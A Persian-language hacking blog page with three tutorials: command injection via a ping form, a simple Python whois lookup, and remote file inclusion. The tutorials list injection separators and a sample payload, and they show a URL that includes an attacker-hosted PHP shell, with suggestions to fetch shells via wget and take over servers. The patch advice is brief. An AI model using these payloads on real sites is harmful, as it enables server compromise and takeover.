تیم سایبری محمد رسول الله

خانه درباره ما تماس با ما shell package <tel> کانال <tel/>

اموزش باگ Rce + پچ کردن

به نام خدا

با یک قسمت دیگه از دوره اموزشی وب هکینگ در خدمتتون هستیم و قراره یک باگ خیلی خفن ساده و کاربردی رو بگیم

 

باگ rce چیست ؟

باگ rce جزو پر خطر ترین باگ ها محسوب میشه چون تمام دستورات سیستمی با دسترسی بالا ران میشه.

باگ RCE مخفف Remote Code Execution هست که متاسفانه در حال گسترش هست که توی این مطلب میخوایم روش نفوذ با باگ rce و پچ کردن با rce رو با هم یاد بگیریم

 

 

نفوذ به سیستم با باگ rce :

ما برای مثال روی یک سایتی که پینگ ایپی و سایت ها رو میگیره تست میکنیم

یعنی داخل اسکریپتش گفته شده هر ورودی که وارد شد رو بعد از دستور ping بزار و اون رو داخل ترمینال ران کن و خورجی رو نمایش بده

خب تا اینجا که باگی نیست اما میتونیم داخل ترمینال یا cmd دو دستور رو داخل یک خط وارد کنیم! و اینجا مشکل کاره J مثلا ما ادرس opensec.blog.ir رو بهش میدیم و اون دستور زیر رو داخل خط فرمان اجرا میکنه

Ping opensec.blog.ir

اما اگر این دستور رو با کاراکتر های مختلفی نظیر:

 

'|'
'||'
' | '
' || '
' |'
'&'
'&&'
';'
'$'
برای مشخص شدن فاصله ها اون هارو داخل تک کوتیشن قرار دادم خودتون هم میتونید دو طرف وسط یا... هم فاصله بزارین و تست کنین

این کامند ها کامل نیستن و کامند های دیگه ای هم هست

 

 

از هم جدا کنیم و بعدش دستور خودمون رو وارد کنیم مثل نمونه زیر اون هر دو تا رو اجرا میکنه

Opensec.blog.ir|dir

و خروجی که تون به خط فرمان میده به شکل زیره:

Ping opensec.blog.ir|dir

خروجی که به ما میده به این صورته که اول نتیجه پینگ رو نشون میده و بعد از اون اگه سیستم ویندوزی باشه لیست فایل های داخل مسیر رو نشون میده حالا اگه ما به جای این دستور ساده بادستور ویگت شل خودمون رو اپلود کنیم و از کل سرور دسترسی بگیریم چی؟ اون موقع دیگه تمام سرور هم ممکنه با سیملینک هک بشه و تمام سایت های روی سرور در خطر ان

 

اموزش پچ کردن باگ rce :

در این باگ هم شما باید ورودی ها رو کنترل کنین مثلا تعریف کنین که فلان ورودی ها غیر مجازن و بگین مثلا ورودی که میگیره از n کاراکتر بیشتر نباشه یا ورودی که میگیره n بخش بیشتر نباشه  یا یک لیست سفید تعریف کنیم و بگیم اگر غیر از این هم بود دستور ران نشه و هزاران فیلتر دیگه که میشه روی ورودی ها اعمال کرد

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد

اگر سوالی داشتین یا مطلب مشکلی داشت حتما در بخش نظرات به اشتراک بزارین

۱۷ تیر ۰۰ ، ۱۳:۴۶ ۰ نظر

گرفتن whois دامنه و دریافت اطلاعات با پایتون

به نام خدا

whois جیست؟

زمانی که فقط یک سرویس دهنده اینترنت بنام ARPANET بود ,یک سازمان بنام DARPA تنها مسئول ثبت دامنه وجود دارد و تمامی دامنه ها به راحتی قابل دسترسی به اطلاعات پایگاه داده WHOIS بود . واقعیت این است که تنها یک سازمان مدیریت هر دو دامنه ها را ثبت  و جزئیات مربوط به WHOIS را منتشر می کنند.به آرامی و با تکامل شبکه جهانی وب ثبت دامنه و مدیریت WHOIS به دور از DARPA منتقل شده و اکنون می توانید دامنه خود را توسط چند  شرکت معتبر اطالاعات خود را ثبت نمایید تعدادی از دامنه ها در همان زمان که تعداد آنها نیز زیاد بود و همچنین این اطلاعات تمامی مشخصات فرد و سازمان  را در اختیار عموم قرار میداد که از همه مهمتر ایمیل اشخاص بود که هکرها با استفاده از این موقعیت حملات فیشینگ را به راحتی انجام میدادند و همچنین هرزنامه های زیادی در آن زمان رایج بود و بدلیل نمایش و مشکلات در اطلاعات WHOIS پروتکل WHOIS تجدید نظر شد و جستجو کلمات و ایمیلها ممنوع شد و امروزه نمایش ایمیل توسط سرویس دهنده ها بصورت تصویر می باشد که این عمر تا حد زیادی از خرابکاری ها توسط هکرها و هرزنامه ها را میگیرد.

 

 

ساخت whois lookup با پایتون:

ابتدا با دستور زیر کتابخانه مخصوص رو دانلود و نصب میکنیم

Pip install python-whois

سپس یک فایل پایتونی ایجاد کنید با پسوند .py

باید کد زیر را جایگذاری و ذخیره کنیم

class="lang-python"

1 #Import library for whois
2 import whois
3 #input url for geting information domain
4 url = input("your target url >>> ")
5 #geting information domain
6 wh = whois.whois(url)
7 #print output
8 print ("\n----------------------------------------\n")
9 print (wh.text)

 

در لاین دوم با دستور import کتابخانه whois رو وارد برنامه میکنیم

در لاین چهارم ادرس قربانی رو از کاربر میگیریم و در متغییر url ذخیره میکنیم

در لاین ششم هم اطلاعات  دامنه رو میگیریم و در متغییر wh ذخیره میکنیم

در لاین هشتم هم با \n یک خط پایین میری و با گذاشتن --- اون هارو از هم جدا میکنیم

در لاین نهم هم متغییر wh رو در حالت تکست با دستور پرینت چاپ میکنیم

 

این مقاله با فرض این هست که پایتون رو نصب دارید و اگر هرجای کار مشکلی بوجود اومد داخل نظرات بگین تا باهم مشکل رو رفع کنیم

 

۱۵ تیر ۰۰ ، ۱۹:۵۶ ۱ نظر

هک سایت با باگ RFI + تامین امنیت

به نام خدا

با اموزش باگ rfi  در دوره اموزش های تست نفوذ وب اپلیکیشن در خدمتتونیم

 

 

 باگ RFI چیست ؟

باگ rfi جزو خطرناک ترین باگ ها محسوب میشه چون میشه با اون دسترسی سرور هم گرفت

این باگ توسط اشتباهات برنامه نویسی ایجاد میشود و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود برای پچ کردن این باگ نیازه دستورات http:// , https:// در ورودی ها ممنوع بشه و از فایروال ها استفاده بشه

 

 

اموزش باگ RFI

برای پیدا کردن باگ باید ورودی های مشکوک رو مورد تست قرار بدین

و میتونین از شل های مختلفی مثل :c99 , alpha , c100 , minishell , … هم استفاده کنین

اول باید شل خودتون رو داخل یک هاست اپلود کین کنین ( باید پسوند فایل رو از پی اچ پی به .txt تغییر بدین )

به عنوان مثال به ادرس زیر توجه کنید

http://target.com/intex.php?page=index.php

در ورودی بالا وبسایت index رو به عنوان ورودی میگیره حالا اگر ما بجای index ادرس شل خودمون رو بدیم شل ما رو اجرا میکنه! و دسترسی ادمین از کل سایت یا سرور میگیریم

و url نهایی ما به شکل زیر میشه

http://target.com/index.php?page=http://host.com/myShell.txt

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد!

اگر سوال یا ابهامی بود در بخش نظرات مطرح کنید

۱۱ تیر ۰۰ ، ۱۷:۲۹ ۰ نظر